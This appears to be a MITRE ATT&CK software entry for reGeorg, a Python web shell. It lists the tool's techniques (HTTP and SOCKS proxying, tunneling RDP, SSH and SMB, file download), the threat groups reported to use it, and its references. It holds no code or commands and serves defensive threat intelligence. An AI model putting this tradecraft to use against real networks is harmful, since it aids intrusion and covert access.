S1187 reGeorg
reGeorg is an open-source web shell written in Python that can be used as a proxy to bypass firewall rules and tunnel data in and out of targeted networks.12
| Item | Value |
|---|---|
| ID | S1187 |
| Associated Names | |
| Type | MALWARE |
| Version | 1.0 |
| Created | 06 January 2025 |
| Last Modified | 15 April 2025 |
| Navigation Layer | View In ATT&CK® Navigator |
Techniques Used
| Domain | ID | Name | Use |
|---|---|---|---|
| enterprise | T1071 | Application Layer Protocol | - |
| enterprise | T1071.001 | Web Protocols | reGeorg can use HTTP to tunnel connections in and out of targeted networks.1 |
| enterprise | T1059 | Command and Scripting Interpreter | - |
| enterprise | T1059.006 | Python | reGeorg is a Python-based web shell.2 |
| enterprise | T1105 | Ingress Tool Transfer | reGeorg has the ability to download files to targeted systems.5 |
| enterprise | T1095 | Non-Application Layer Protocol | reGeorg can tunnel TCP sessions into targeted networks.1 |
| enterprise | T1572 | Protocol Tunneling | reGeorg can tunnel TCP sessions including RDP, SSH, and SMB through HTTP.134 |
| enterprise | T1090 | Proxy | reGeorg can establish an HTTP or SOCKS proxy to tunnel data in and out of a network.213 |
| enterprise | T1021 | Remote Services | - |
| enterprise | T1021.001 | Remote Desktop Protocol | reGeorg can be used to tunnel RDP connections.1 |
| enterprise | T1021.002 | SMB/Windows Admin Shares | reGeorg has the ability to tunnel SMB sessions.1 |
| enterprise | T1021.004 | SSH | reGeorg can communicate using SSH through an HTTP tunnel.1 |
| enterprise | T1505 | Server Software Component | - |
| enterprise | T1505.003 | Web Shell | reGeorg is a web shell that has been installed on exposed web servers for access to victim environments.34 |
Groups That Use This Software
| ID | Name | References |
|---|---|---|
| G0016 | APT29 | 3 |
| G1003 | Ember Bear | 4 |
| G0007 | APT28 | 6 |
References
-
FortiGard Labs. (2019, March 12). ReGeorg.HTTP.Tunnel. Retrieved December 3, 2024. ↩↩↩↩↩↩↩↩
-
xl7dev. (2016). reGeorg-master. Retrieved December 3, 2024. ↩↩↩
-
Mandiant. (2022, May 2). UNC3524: Eye Spy on Your Email. Retrieved August 17, 2023. ↩↩↩↩
-
Microsoft Threat Intelligence. (2023, June 14). Cadet Blizzard emerges as a novel and distinct Russian threat actor. Retrieved July 10, 2023. ↩↩↩
-
Paganini, P. (2023, October 27). France agency ANSSI warns of Russia-linked APT28 attacks on French entities. Retrieved December 3, 2024. ↩